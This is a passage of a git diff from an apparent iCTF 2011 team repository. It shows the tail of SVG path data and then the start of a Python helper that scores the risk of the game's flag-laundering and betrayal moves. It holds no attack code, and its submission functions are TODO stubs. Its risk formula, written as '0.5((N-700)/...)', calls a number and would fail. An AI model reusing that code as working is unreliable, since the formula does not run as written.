511.5,85.361626 C 510.55016,84.997137 510,85.375419 510,86.393011 C 510,87.276855 510.525,88 511.16667,88 C 511.80833,88 512.01708,88.31625 511.63056,88.702777 C 510.33237,90.000967 519.31902,92.050579 522,91.067767 C 524.33227,90.212786 531.88003,88.598745 533,88.715486 C 533.275,88.744151 534.28161,88.000235 535.23691,87.062339 C 536.88161,85.447613 536.76215,85.244086 532.98691,83.228979 C 530.79411,82.058526 529,81.528185 529,82.050442 C 529,82.572699 527.65,83 526,83 C 524.35,83 523,83.476558 523,84.059017 C 523,84.661216 522.4608,84.777001 521.75,84.327437 C 519.93694,83.180716 515,83.069981 515,84.176034 C 515,84.694134 514.54266,84.835382 513.98369,84.489919 C 511.6878,83.070981 514.45726,82.077663 520.57829,82.124642 C 524.15683,82.152107 527.64325,81.711039 528.3259,81.144492 C 529.01699,80.570934 530.15527,80.477927 530.89424,80.934635 C 531.62417,81.385761 533.14195,81.514134 534.26707,81.219909 C 535.71011,80.842544 536.08975,81.045772 535.55576,81.909785 C 535.07289,82.691081 535.55944,83.333537 536.89938,83.683939 C 538.05472,83.986067 539,84.839946 539,85.581448 C 539,87.414128 535.58174,89.110294 529,90.543528 C 525.975,91.202249 522.375,92.002336 521,92.3215 C 519.625,92.640663 517.6,92.505521 516.5,92.021184 z M 327.25,81.034846 C 329.3125,79.889402 331,78.390244 331,77.703383 C 331,76.01131 323.20118,76.033362 322.55116,77.727273 C 321.97715,79.223131 315.3983,79.453486 314.50555,78.008986 C 313.84283,76.936678 316.78664,72.378548 318.63245,71.618992 C 322.57003,69.998667 335.11211,77.049445 331.90454,79.08016 C 330.80278,79.777683 330.93115,79.997466 332.5,80.099686 C 333.6,80.171358 332.925,80.567493 331,80.979986 C 329.075,81.39248 326.6,82.042161 325.5,82.423723 C 324.4,82.805284 325.1875,82.180289 327.25,81.034846 z M 321.75,76.75 C 321.20785,75.123558 315.79215,75.123558 315.25,76.75 C 314.96717,77.598485 316.01111,78 318.5,78 C 320.98889,78 322.03283,77.598485 321.75,76.75 z M 322,74 C 321.175,73.466844 320.05,73.030626 319.5,73.030626 C 318.95,73.030626 319.175,73.466844 320,74 C 320.825,74.533156 321.95,74.969374 322.5,74.969374 C 323.05,74.969374 322.825,74.533156 322,74 z M 248,78.5 C 248,78.225 247.8875,77.705398 247.75,77.345329 C 247.24441,76.021348 250.95014,76.234995 252.07876,77.594896 C 253.0299,78.740951 252.76141,79 250.62244,79 C 249.1801,79 248,78.775 248,78.5 z M 857.5,77.234687 C 856.15478,76.246368 855.76656,74 856.94098,74 C 857.45852,74 858.17957,74.481535 858.54331,75.070078 C 858.90705,75.65862 860.17111,76.530096 861.35233,77.006691 C 863.41664,77.839592 863.40296,77.875093 861,77.921301 C 859.625,77.947741 858.05,77.638765 857.5,77.234687 z M 233,73 C 233,72.45 233.45,72 234,72 C 234.55,72 235,72.45 235,73 C 235,73.55 234.55,74 234,74 C 233.45,74 233,73.55 233,73 z M 755,73.239022 C 755,71.311475 757.97406,69.776675 760.48701,70.407385 C 763.11061,71.065866 763.90935,72.574667 761.75,72.79313 C 761.0625,72.862685 759.2625,73.215145 757.75,73.576374 C 756.15372,73.957613 755,73.816083 755,73.239022 z M 760,72 C 761.21948,71.211914 761.09025,71.027762 759.30902,71.015313 C 758.10398,71.006891 756.83992,71.45 756.5,72 C 755.71313,73.273187 758.02988,73.273187 760,72 z M 876.25,68.968838 C 874.06394,68.090148 872.98772,64 874.94258,64 C 875.461,64 875.70953,64.91202 875.49486,66.02671 C 875.27749,67.155427 875.53169,67.78943 876.06859,67.457612 C 876.59881,67.129917 876.77373,66.442898 876.45729,65.930902 C 876.14086,65.418906 876.32102,65 876.85765,65 C 877.39428,65 878.04997,65.5625 878.31475,66.25 C 878.57952,66.9375 878.75117,66.552642 878.69618,65.394761 C 878.64119,64.23688 878.12456,63.326085 877.5481,63.370774 C 876.97165,63.415462 873.22304,62.857222 869.21786,62.13024 C 864.05975,61.193989 861.56311,61.117693 860.65825,61.868663 C 859.88095,62.513766 858.22953,62.619363 856.44039,62.138365 C 853.54971,61.361225 853.53693,61.328013 855.68426,60.17393 C 856.8856,59.528268 858.9331,59 860.23426,59 C 861.53542,59 863.0953,58.504702 863.70066,57.899337 C 864.50155,57.098453 864.98292,57.370815 865.46805,58.899337 C 865.83475,60.054702 866.73131,61 867.4604,61 C 869.20354,61 870.23103,58.252238 868.69382,57.701512 C 865.77999,56.657595 869.6824,55.757765 880.17664,55.053763 C 886.40449,54.63597 890.4875,54.227959 889.25,54.14707 C 886.91624,53.994525 885.99087,51 888.27749,51 C 890.25283,51 894.1032,54.023996 893.45771,55.068422 C 893.14105,55.58079 888.74602,56.044856 883.69098,56.09968 C 878.63594,56.154504 873.6,56.492004 872.5,56.84968 C 869.89836,57.69563 869.44901,60 871.88569,60 C 874.48141,60 879.31294,62.622918 879.62585,64.201939 C 879.76733,64.915873 880.10855,66.5125 880.38412,67.75 C 880.92485,70.178201 879.96371,70.461567 876.25,68.968838 z M 769.78754,64.704164 C 765.96465,62.627557 765.64455,61 769.05902,61 C 770.12656,61 770.8875,60.474289 770.75,59.831753 C 770.6125,59.189218 771.50983,58.136551 772.74407,57.492494 C 773.97831,56.848437 774.65331,55.957705 774.24407,55.51309 C 773.83483,55.068475 774.51312,54.954176 775.75138,55.259091 C 776.98964,55.564006 777.79125,55.471251 777.53274,55.052969 C 777.27422,54.634687 778.1736,53.786301 779.53136,53.167667 C 780.88911,52.549033 782,51.54573 782,50.938105 C 782,50.330481 782.5625,50.026842 783.25,50.263353 C 783.9375,50.499863 786.975,49.838865 790,48.794467 C 793.025,47.75007 798.875,46.708097 803,46.478973 C 807.125,46.249849 813.9272,45.527061 818.11599,44.872778 C 826.65359,43.539219 830.30702,44.136928 827.92754,46.477968 C 826.6665,47.718633 818.75123,49.064398 805.1722,50.346859 C 802.79191,50.571664 800.33941,51.260586 799.7222,51.877798 C 799.10499,52.495009 797.86627,53 796.96948,53 C 794.77752,53 786.36949,57.318066 783.2067,60.068074 L 780.65746,62.284604 L 785.07873,64.593916 L 789.5,66.903229 L 781.5,66.812009 C 775.50009,66.743594 772.57184,66.21661 769.78754,64.704164 z M 782.5,64.239689 C 778.86433,62.131378 778.24168,60.054326 780.6794,58.166507 C 782.31978,56.896168 782.15845,56.819634 779.04971,57.393358 C 777.15205,57.743575 775.35205,58.393663 775.04971,58.837999 C 774.74737,59.282335 773.7125,59.936436 772.75,60.291557 C 770.07676,61.277867 770.66043,62.766507 774.00873,63.501917 C 775.66353,63.865372 776.83173,64.463626 776.60474,64.831372 C 776.37775,65.199117 778.28632,65.60786 780.84601,65.739689 L 785.5,65.979379 L 782.5,64.239689 z M 786.25,55.19061 C 786.1081,54.514841 787.10657,54 788.55902,54 C 790.20629,54 790.86927,53.597493 790.41982,52.870268 C 789.99266,52.179106 790.2609,51.934574 791.1108,52.240366 C 791.87486,52.515273 793.9625,52.146614 795.75,51.421125 C 797.5375,50.695636 799,50.319924 799,50.58621 C 799,50.852497 799.7875,50.650283 800.75,50.136846 C 801.7125,49.623409 806.2022,48.939541 810.72711,48.61714 C 821.64644,47.839134 826.91336,46.949207 827.64968,45.757812 C 828.2326,44.814633 823.59046,45.056942 816.5,46.339801 C 814.85,46.638332 809.26222,47.138599 804.08271,47.451507 C 798.88982,47.765223 793.3258,48.688717 791.67907,49.510215 C 790.03658,50.329597 788.0603,51 787.28734,51 C 786.51439,51 786.16008,51.45 786.5,52 C 786.83992,52.55 786.36138,53 785.43657,53 C 783.98976,53 783.94554,53.229458 785.11971,54.644246 C 786.33772,56.111852 786.22999,56.207771 784.11693,55.537112 C 782.43008,55.001727 781.95607,55.119911 782.46801,55.948234 C 783.37977,57.4235 786.58407,56.781602 786.25,55.19061 z M 1212.9991,65.785184 C 1213.0011,64.191058 1217.3452,62.911025 1221.784,63.196599 C 1228.785,63.647005 1227.4934,65.426428 1219.7491,66 C 1216.0361,66.275 1212.9986,66.178333 1212.9991,65.785184 z M 1223.75,64.283746 C 1222.2375,64.054621 1219.7625,64.054621 1218.25,64.283746 C 1216.7375,64.51287 1217.975,64.700336 1221,64.700336 C 1224.025,64.700336 1225.2625,64.51287 1223.75,64.283746 z M 146.5153,59.024748 C 145.92713,58.073077 149.76594,54.979903 151.47251,55.030409 C 152.03763,55.047133 151.70304,55.524791 150.72897,56.091869 C 149.7549,56.658948 149.18982,57.49811 149.47322,57.956676 C 149.75663,58.415241 149.33051,59.04293 148.52628,59.351541 C 147.72205,59.660152 146.81711,59.513095 146.5153,59.024748 z M 1076.3559,56.75 C 1076.0953,56.3375 1076.6101,56 1077.5,56 C 1078.3899,56 1078.8691,55.597153 1078.5648,55.104785 C 1077.8399,53.931972 1081.1634,52.661232 1081.9201,53.821888 C 1082.239,54.311183 1084.1717,55.018854 1086.2149,55.39449 C 1092.9992,56.641761 1091.6423,58.118161 1084.0045,57.799417 C 1080.0585,57.634737 1076.6166,57.1625 1076.3559,56.75 z M 1086.25,56.337719 C 1085.5625,56.060307 1084.4375,56.060307 1083.75,56.337719 C 1083.0625,56.615132 1083.625,56.842105 1085,56.842105 C 1086.375,56.842105 1086.9375,56.615132 1086.25,56.337719 z M 184.08218,52.589565 C 181.67584,51.256363 181.67427,51.244694 183.75138,50.133056 C 184.9641,49.484027 187.86215,49.259141 190.66921,49.596239 L 195.5,50.176365 L 192.56575,48.551896 C 190.95192,47.658439 189.05333,47.149292 188.34668,47.420459 C 186.78464,48.019871 181.76634,45.566989 182.6818,44.651533 C 183.61347,43.71986 188,43.844343 188,44.802456 C 188,45.243806 190.21719,46.4022 192.92708,47.376665 C 196.65527,48.717304 198.34093,48.887907 199.85464,48.077795 C 200.9549,47.488953 202.56271,47.278703 203.42756,47.610575 C 204.2924,47.942446 205,47.74239 205,47.166006 C 205,45.483311 202.92426,44.675736 201.71287,45.887132 C 201.10079,46.49921 199.9025,46.989753 199.05,46.97723 C 198.1975,46.964706 198.94397,46.242473 200.70883,45.372266 C 203.74246,43.876461 204.06499,43.905961 206.61596,45.912553 C 208.26269,47.207874 210.05153,47.801032 211.20609,47.434589 C 212.2466,47.104344 214.17731,47.541386 215.49657,48.405794 C 216.81582,49.270201 218.58222,49.713811 219.4219,49.391594 C 220.76817,48.874985 220.75325,48.610397 219.29571,47.152873 C 217.75852,45.615701 217.76349,45.476757 219.36668,45.167957 C 220.31481,44.985333 222.30767,45.256081 223.79527,45.769619 C 225.50132,46.358566 228.73504,46.330587 232.55313,45.693842 C 235.88235,45.138627 239.77021,44.976495 241.19283,45.333548 C 244.2112,46.091111 245.52425,48.66339 243.89481,50.626748 C 242.42921,52.392687 233.1267,52.492927 232.45677,50.75 C 232.16791,49.998511 230.00733,49.471301 227.03917,49.428039 C 224.32374,49.38846 222.31142,49.694866 222.56733,50.10894 C 223.42427,51.495494 221.19438,52.0244 218.61932,51.045365 C 217.14369,50.484332 215.83871,50.45196 215.51949,50.968468 C 215.21626,51.459094 211.93783,51.876046 208.23409,51.895027 C 204.53034,51.914009 199.07608,52.395393 196.11351,52.964769 C 189.18149,54.297035 187.04371,54.230367 184.08218,52.589565 z M 193,52.605035 C 193,52.387805 191.23785,52.042023 189.08412,51.836631 C 186.93038,51.63124 185.38194,51.808974 185.64313,52.231596 C 186.11838,53.000566 193,53.349882 193,52.605035 z M 206.95748,50.843074 C 214.59667,50.792974 217.73981,49.881604 214.52628,48.648459 C 213.72205,48.339848 212.81857,48.484542 212.51854,48.970001 C 212.20464,49.477904 210.61602,49.463468 208.77684,48.935999 C 206.74395,48.352972 205.22021,48.379786 204.59033,49.009672 C 204.04565,49.554353 202.2275,50.006891 200.55,50.015313 C 198.8725,50.023735 196.825,50.503213 196,51.080819 C 194.8185,51.908025 194.96748,51.999887 196.70168,51.513455 C 197.91261,51.173798 202.52772,50.872126 206.95748,50.843074 z M 241.58686,49.212102 C 243.28099,46.895241 242.53692,46.117882 238.73262,46.230162 C 236.95468,46.282636 236.0589,46.513618 236.74201,46.743455 C 237.58776,47.028014 237.69166,47.707626 237.06767,48.873565 C 236.34464,50.224546 236.59434,50.619162 238.25119,50.743968 C 239.40612,50.830967 240.90717,50.141627 241.58686,49.212102 z M 248.62367,52.166018 C 245.76779,51.616064 247.40625,49.524219 250.96538,49.176321 C 255.55356,48.727837 259,49.749932 259,51.559109 C 259,52.730533 258.00688,53.013449 254.679,52.790057 C 252.30246,52.630526 249.57755,52.349708 248.62367,52.166018 z M 257.5,51 C 257.16008,50.45 255.22102,50.031628 253.19098,50.070285 C 250.21631,50.12693 249.88814,50.307359 251.5,51 C 254.30808,52.206672 258.24576,52.206672 257.5,51 z M 1068.1566,51.591381 C 1065.9379,50.396801 1065.905,50.237882 1067.5379,48.60499 C 1069.049,47.093845 1070.7307,46.953142 1081.1208,47.468505 C 1087.6428,47.792006 1093.9796,48.426816 1095.2025,48.879193 C 1097.3872,49.687376 1097.3911,49.720325 1095.4267,50.771622 C 1092.2691,52.461556 1070.9624,53.10205 1068.1566,51.591381 z M 1085.3821,50.310287 C 1086.8871,49.88735 1086.9873,49.605933 1085.8821,48.905989 C 1083.8217,47.601019 1080.7469,47.78152 1081.5974,49.157524 C 1082.1077,49.983225 1081.6229,50.094016 1079.9064,49.544004 C 1072.8795,47.29248 1067.6813,48.057239 1069.5425,51.068725 C 1070.1755,52.093055 1080.8586,51.581525 1085.3821,50.310287 z M 1094,50 C 1094,49.45 1092.65,49 1091,49 C 1089.35,49 1088,49.45 1088,50 C 1088,50.55 1089.35,51 1091,51 C 1092.65,51 1094,50.55 1094,50 z M 1102.2144,51.923125 C 1097.8091,50.583987 1098.9685,49.158859 1104.2438,49.428512 C 1106.5847,49.548168 1110.525,49.739387 1113,49.853443 C 1116.4697,50.013336 1117.1159,50.284927 1115.8223,51.039626 C 1113.2284,52.55301 1105.8602,53.031391 1102.2144,51.923125 z M 1109.5,51 C 1108.4,50.527314 1106.375,50.115833 1105,50.085598 C 1103.0296,50.042272 1102.8178,50.23599 1104,51 C 1104.825,51.533156 1106.85,51.944637 1108.5,51.914402 C 1111.0757,51.867204 1111.2171,51.737882 1109.5,51 z M 175.66274,51.275326 C 172.93035,50.866023 172.88988,50.779164 174.56773,48.925158 C 175.52597,47.866321 177.02773,46.964474 177.90499,46.921053 C 178.81882,46.875821 178.99807,46.637333 178.3247,46.362619 C 177.67829,46.098902 175.33371,46.809429 173.11454,47.941567 C 168.25419,50.421134 166.85754,50.534814 167.68302,48.383666 C 168.18548,47.074261 167.94216,46.94693 166.40163,47.71312 C 164.8331,48.493237 160.88935,48.615387 154.55,48.080202 C 152.29587,47.889902 155.79635,46.201878 159.5,45.693187 C 161.7,45.391019 162.7125,45.369434 161.75,45.64522 C 160.7875,45.921006 160,46.472062 160,46.86979 C 160,47.872825 163.99122,47.558063 167,46.317745 C 168.375,45.750925 170.175,45.033077 171,44.722528 C 171.86552,44.396726 171.23105,44.071731 169.5,43.954192 C 167.42896,43.813565 168.20309,43.485041 172,42.893245 C 178.63995,41.858325 182.6662,42.492351 181.13909,44.332405 C 180.38784,45.237606 180.63628,45.916267 182.03974,46.792743 C 183.87702,47.940142 183.88881,48.106993 182.26665,50.001539 C 181.32553,51.100692 180.09303,51.932576 179.52776,51.850168 C 178.96249,51.76776 177.22323,51.509081 175.66274,51.275326 z M 176,45 C 177.29269,44.164601 177.26629,44.028509 175.80902,44.015313 C 174.87898,44.006891 173.83992,44.45 173.5,45 C 172.71782,46.265597 174.04163,46.265597 176,45 z M 891.57034,51.113809 C 891.08167,50.323122 893.5416,49.852407 906,48.352652 C 907.925,48.120918 915.96105,47.511575 923.8579,46.998556 C 931.75474,46.485537 938.81686,45.566956 939.55149,44.957264 C 941.14684,43.633244 950.67157,40.994854 953.5,41.09347 C 954.6,41.131822 952.35,41.941231 948.5,42.892155 C 944.65,43.84308 941.58036,45.059931 941.67857,45.596269 C 941.77679,46.132607 941.10179,46.648264 940.17857,46.742174 C 939.25536,46.836084 936.475,47.163169 934,47.469029 C 931.525,47.774889 925.675,48.196536 921,48.406023 C 908.87015,48.949559 899.12223,50.003029 896.30241,51.075122 C 893.26486,52.229998 892.26523,52.238171 891.57034,51.113809 z M 1062,49 C 1062,47.706093 1063.7003,47.706093 1064.5,49 C 1064.8399,49.55 1064.4165,50 1063.559,50 C 1062.7016,50 1062,49.55 1062,49 z M 638.25,44.02693 C 635.9125,42.9659 634,41.68846 634,41.188175 C 634,40.68789 632.42839,40.403266 630.50753,40.555677 C 628.13705,40.743763 626.28982,40.190242 624.75753,38.832691 C 622.68723,36.99847 622.66587,36.881206 624.5,37.418751 C 626.40308,37.976502 626.41185,37.936425 624.68098,36.591746 C 622.93097,35.232186 622.93566,35.155195 624.80488,34.56193 C 625.87347,34.22277 629.84203,33.953254 633.62389,33.963006 C 641.00352,33.982035 645.59243,33.653356 653.5,32.539389 C 656.71987,32.085794 658.02519,32.170825 657.16635,32.778223 C 656.21596,33.450375 656.69061,33.68961 658.81805,33.610713 C 660.45999,33.549821 661.55999,33.104121 661.2625,32.620268 C 660.96501,32.136416 661.34675,31.963108 662.1108,32.235141 C 662.87486,32.507173 664.175,32.394666 665,31.985125 C 666.71558,31.13349 680.08481,32.726818 681.3125,33.929227 C 682.57304,35.163813 674.99613,36.714314 668.63099,36.524308 C 665.4788,36.430212 662.69841,36.678959 662.45236,37.07708 C 662.20631,37.4752 664.30147,38.626736 667.10827,39.636048 L 672.21155,41.47116 L 669.35577,42.627055 C 667.56162,43.353249 665.01301,43.494297 662.5,43.006473 C 660.3,42.579412 658.95,42.163937 659.5,42.083196 C 660.05,42.002454 659.67594,41.31186 658.66875,40.548541 C 657.28407,39.499137 656.12572,39.408816 653.91875,40.178169 C 652.31344,40.737784 651,41.601629 651,42.097825 C 651,42.594021 650.14814,43 649.10699,43 C 648.06583,43 646.95496,43.675 646.63837,44.5 C 645.871,46.499731 643.38937,46.359777 638.25,44.02693 z M 646.41097,43.371408 C 646.93408,42.008203 646.52376,41.845248 643.89296,42.371408 C 642.16433,42.717134 640.24375,43.053242 639.625,43.118315 C 638.71807,43.213695 642.30154,44.358852 645.14301,44.881685 C 645.49667,44.946758 646.06725,44.267134 646.41097,43.371408 z M 667.58928,40.790025 C 666.69298,40.28843 664.95622,40.209871 663.72982,40.615449 C 661.5047,41.351308 661.50527,41.354248 664,42.008703 C 667.36886,42.892476 669.84428,42.051989 667.58928,40.790025 z M 650.16667,41.135084 C 650.35,40.65938 652.3,39.30996 654.5,38.136372 C 657.45801,36.558426 657.81675,36.152418 655.87714,36.577786 C 654.43457,36.894151 650.95684,36.470729 648.14886,35.636847 C 642.0707,33.831827 640.47548,35.100066 645.2005,37.980859 L 648.5,39.992524 L 643.5,40.146456 L 638.5,40.300387 L 643,41 C 649.82094,42.060448 649.81012,42.060244 650.16667,41.135084 z M 636.05357,38.481098 C 639.17096,37.381221 640.55053,37.272737 641.0543,38.087861 C 641.49641,38.803201 641.97319,38.852395 642.36229,38.222819 C 642.69905,37.67793 641.54744,36.64097 639.80315,35.918464 C 637.67046,35.035071 636.51637,34.950904 636.2795,35.661485 C 636.05094,36.347175 634.44794,36.447013 631.71364,35.945855 C 626.51679,34.993349 625.98034,35.335003 630.03542,37.014672 C 632.28499,37.946475 632.77368,38.527641 631.81749,39.133961 C 629.83442,40.391414 631.26334,40.17119 636.05357,38.481098 z M 677.5,35.065118 C 679.25916,34.896335 679.19894,34.751436 677,33.86186 C 675.625,33.305608 672.77938,33.119745 670.67641,33.448832 C 668.01208,33.865762 667.06009,33.71179 667.53647,32.940989 C 668.04211,32.12285 662.85129,34.183838 661.28899,35.421516 C 661.02663,35.629369 674.76765,35.327273 677.5,35.065118 z M 188.2197,42.561559 C 182.30367,41.11757 179.63279,39.356627 184.875,40.35636 C 186.73125,40.710362 189.57031,41 191.18402,41 C 192.88538,41 193.85838,41.420124 193.5,42 C 193.16008,42.55 193.58352,43 194.44098,43 C 195.29844,43 196,42.598145 196,42.106989 C 196,40.962039 193.56426,40.032405 190.16821,39.881204 C 188.68092,39.814986 189.85826,39.333122 192.82834,38.79246 C 195.75893,38.258988 199.30603,38.110977 200.71078,38.463546 C 203.23868,39.098008 203.24471,39.123365 201.29874,40.936309 C 198.51286,43.531751 194.3261,44.052013 188.2197,42.561559 z M 214.88029,42.355754 C 213.6589,40.884079 213.77725,40.790921 216.00784,41.468149 C 219.51883,42.534115 220.85894,44 218.32244,44 C 217.17979,44 215.63082,43.260089 214.88029,42.355754 z M 245.77055,42.006027 C 242.64392,41.064333 239.58952,38.371722 240.79959,37.623859 C 242.21924,36.746468 253.39002,38.670059 253.78674,39.860225 C 253.9957,40.487101 255.28072,41 256.64235,41 C 258.03816,41 258.84845,41.436191 258.5,42 C 257.77132,43.179036 249.67793,43.182868 245.77055,42.006027 z M 250.5,40 C 250.86506,39.409327 249.76356,39.006268 247.80902,39.015313 C 245.30464,39.026902 244.86475,39.266346 246,40 C 247.94393,41.256262 249.72359,41.256262 250.5,40 z M 228,41 C 229.85794,40.404983 228.89485,40.17376 224.25,40.09968 C 220.8125,40.044856 218,39.55 218,39 C 218,38.45 217.325,38 216.5,38 C 215.675,38 215,37.607514 215,37.127808 C 215,35.720433 222.8705,34.860326 225.05428,36.029051 C 226.14716,36.613942 227.45895,36.834387 227.96937,36.51893 C 228.47979,36.203472 230.97471,36.468442 233.51364,37.107751 C 236.88752,37.957304 237.83206,38.56794 237.02329,39.376706 C 236.21453,40.185473 235.71466,40.156346 235.16593,39.268479 C 234.75299,38.600337 232.40923,37.831941 229.95757,37.560932 C 227.50591,37.289923 224.15,36.798089 222.5,36.467967 L 219.5,35.867746 L 222.5,37.299792 C 226.8868,39.393823 235.35053,41.186456 237.30658,40.43585 C 238.26932,40.066411 239,40.263668 239,40.893011 C 239,41.602842 236.57828,41.964237 232.25,41.90032 C 227.34947,41.827952 226.18499,41.581268 228,41 z M 935.27613,40.686564 C 935.49641,40.033954 936.60873,39.5 937.74796,39.5 C 938.88719,39.5 940.07821,39.244231 940.39468,38.931624 C 940.71115,38.619018 937.03932,38.28511 932.23504,38.189607 C 923.12805,38.008571 921.04622,37.76598 914.62866,36.137972 C 912.49943,35.597828 910.23652,35.355745 909.59997,35.600011 C 908.96342,35.844277 907.55607,35.395874 906.47251,34.60356 C 904.57568,33.216562 904.61394,33.136237 907.50121,32.443607 C 909.15054,32.047947 910.95,31.386661 911.5,30.974084 C 913.58603,29.409263 922.78701,28.865842 927.11408,30.051898 C 930.79509,31.060867 931.17856,31.383089 929.5,32.056756 C 927.5,32.859429 927.5,32.859429 929.5,33.036014 C 930.6,33.133135 932.175,33.312791 933,33.435249 C 933.825,33.557707 935.31406,33.734872 936.30902,33.82895 C 937.30398,33.923027 937.83992,34.45 937.5,35 C 936.46101,36.681113 937.97247,38.081599 939.81069,37.141037 C 942.63403,35.696413 947.22115,34.833159 946.58241,35.86666 C 946.254,36.398033 946.87464,36.584038 947.99685,36.290572 C 949.09664,36.002972 951.17766,36.541615 952.62135,37.487558 C 954.06505,38.4335 954.93928,38.710776 954.56411,38.103727 C 954.18893,37.496677 954.31038,37 954.83399,37 C 955.35761,37 956.04504,37.675 956.36163,38.5 C 956.81787,39.688954 955.95876,40.037924 952.21862,40.182888 C 949.62338,40.283477 946.21529,40.275361 944.64508,40.164854 C 943.07488,40.054346 940.23439,40.3935 938.33289,40.918529 C 935.76087,41.628699 934.97817,41.569304 935.27613,40.686564 z M 951.5,38.998342 C 952.86556,38.978564 953.10577,38.719014 952.25724,38.180146 C 951.22959,37.527522 943.76168,37.375579 942,37.971451 C 940.61465,38.44003 945.78145,39.845137 947.5,39.467173 C 948.6,39.225248 950.4,39.014274 951.5,38.998342 z M 934.30984,36.564197 C 936.7895,34.684155 935.69165,34.364726 927,34.437341 C 918.52822,34.508119 915.81845,36.343042 923.53609,36.782934 C 926.26624,36.938548 928.95,37.240521 929.5,37.453987 C 931.32754,38.163291 932.48255,37.949622 934.30984,36.564197 z M 923.95566,32.358868 C 926.21148,31.907705 926.76704,31.467788 925.83066,30.874181 C 923.85523,29.621881 918.90576,29.904411 915.5,31.463885 L 912.5,32.837562 L 916.625,32.918781 C 918.89375,32.963452 922.19255,32.711491 923.95566,32.358868 z M 234.5,34 C 234.14044,33.418215 235.13661,33 236.88197,33 C 238.53197,33 240.16008,33.45 240.5,34 C 240.85956,34.581785 239.86339,35 238.11803,35 C 236.46803,35 234.83992,34.55 234.5,34 z M 747,32.44987 C 741.89944,30.988939 741.19885,31.122228 757.69725,30.414698 C 763.78296,30.153714 767.12767,30.397563 767.58373,31.135478 C 768.05745,31.901966 767.1578,32.12049 764.70663,31.834329 C 762.74514,31.605337 761.32866,31.722774 761.5589,32.0953 C 762.82827,34.149183 753.70828,34.371292 747,32.44987 z M 770,33 C 768.89475,32.28573 769.55266,32.030626 772.5,32.030626 C 775.44734,32.030626 776.10525,32.28573 775,33 C 774.175,33.533156 773.05,33.969374 772.5,33.969374 C 771.95,33.969374 770.825,33.533156 770,33 z M 781,33.571429 C 781,33.335714 781.6796,32.46326 782.51022,31.632641 C 783.85717,30.285687 783.62415,30.186733 780.35474,30.717285 C 777.97852,31.102893 776.91105,30.952943 777.32014,30.291012 C 778.07877,29.063531 785.2328,27.986613 787.93469,28.693172 C 789.07967,28.992591 789.64337,29.765782 789.32381,30.598536 C 788.58756,32.517195 793.85976,32.420645 796.44113,30.468197 C 798.56963,28.858283 802.57598,28.504902 803.40949,29.853551 C 803.69996,30.323536 806.4821,30.307994 809.60059,29.818967 C 812.71556,29.330492 815.50473,29.171394 815.79875,29.465415 C 816.94629,30.612961 814.6469,31.473717 809.68617,31.753601 C 806.83378,31.914533 801.125,32.457988 797,32.961279 C 788.85469,33.955088 781,34.254622 781,33.571429 z " + id="path2171" /> +</svg> diff --git a/network/Diagram1.dia b/network/Diagram1.dia Binary files differ. diff --git a/network/Diagram1.dia~ b/network/Diagram1.dia~ Binary files differ. diff --git a/network/Diagram1.png b/network/Diagram1.png Binary files differ. diff --git a/riskasses/._riskasses.py b/riskasses/._riskasses.py Binary files differ. diff --git a/riskasses/riskasses.py b/riskasses/riskasses.py @@ -0,0 +1,691 @@ +#!/usr/bin/env python +import socket +import threading +import SocketServer +from datetime import datetime +import re +import pickle +import time +import json +from termcolor import colored, cprint +from pprint import pprint as pp +import ipaddr +import threading + +class ictf: + # Risk assesment and money laundering library based on + # http://ictf.cs.ucsb.edu/iCTF_2011_Description.txt + # + # Missing Information, that will be provided at beginning of iCTF2011: + + # - Regular expression for flags + #flag_re = r'[A-Fa-f0-9]{40}' + flag_re = r'FOO|BAR|BAZ' + + # - ID of this team + my_id = "A-team" + + # - Overall risk function + def risk_function(self, R, M, N, Q): + ''' Calculates the risk, using the following input: + R: Risk associated with service (float, probability, <= 1) + M: Amount of money to launder + N: Amount of money that has been laundered through that team by us + Q: Amount of money that has been laundered through that svc by us + + Must return a probability (float smaller/equal 1.0)''' + + return ((R*(M/10))+0.5((N-700)/(300+ abs(N-700) )+1) + 0.5((Q-1500)/(300+ abs(Q-1500)) +1))/3 + + + # - Submit launder requests + def _launder_request(self, amount, flag): + '''Must return a tuple with the following format: + (result, points_gained, msg, exploited_team, exploited_svc) with + state: "SUCCESS", "BAD_FLAG", "OLD_FLAG", "BAD_LUCK" or + "OTHER" + points_gained: amount of points gained + msg: whatever flugsubmission returned + exploited_team, exploited_svc: if msg contains that information, + include team/svc id, otherwise None''' + + # TODO + return ("OTHER", 0.0, 'not yet implemented', None, None) + + # - Submit betrayal requests + def _betrayal_request(self, flag): + '''Must return a tuple with the following format: + (result, msg, from_team, from_service) with state being: + "SUCCESS", "OLD_FLAG", "BAD_FLAG" or "OTHER" + and msg whatever flugsubmission returned + from_team, from_service if msg contains that information, + include team/svc id, otherwise None''' + + # TODO + return ("OTHER",'not yet implemented', None, None) + + # THAT'S IT! NOTHING TO DONE BELOW + + # - State Pusher receive port + recv_port = 55555 + + def __init__(self, my_id=my_id): + self.teams = {} + # Format: + # { "TEAM1_ID": {'money': 123, + # 'points': 123, + # 'svc_up': ["SVC1_ID",...], + # 'svc_comp': ["SVC99_ID",...], + # 'N': {"TEAM2_ID": 4, ...}, + # 'Q': {"SVC1_ID": 6, ...} + # 'D': 0.33, + # 'subnet': '1.2.3.0/24', + # 'challenges_solved': [30, 5391, 305]} + + self.services = {} + # Format: + # { "SVC1_ID": {'C': 0.33, # cut in Percentage/100 + # 'P': 0.67, # profit in Percentage/100 + # 'R': 0.1} # risk in Probability + + self.transactions = [] + # Format: + # [{ 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.', # Whatever flagsubmission returned + # },...] + + self.unused_flags = [] + # Format: + # [{ 'flag': 'fooBAR', # String associated with flag + # 'time_received': ..., # Time of reception + # 'from_team': 'TEAM1_ID', # Where did it come from? + # # if unknown, None + # 'from_service': 'SVC1_ID', # Where did it come from? + # # if unknown, None + # },...] + + self.all_flags = [] + # List of all flags ever put in unused_flags or transactions + + self.my_id = my_id + self.recv_state_socket = None + self.recv_state_thread = None + self.recv_flag_server = None + + self.flag_dissipater_instance = None + + # Do you want every tick to produce a message? + self.show_ticks = True + self.tick_callback = self.print_scorboard + + def get_risks(self, amount, service=None, 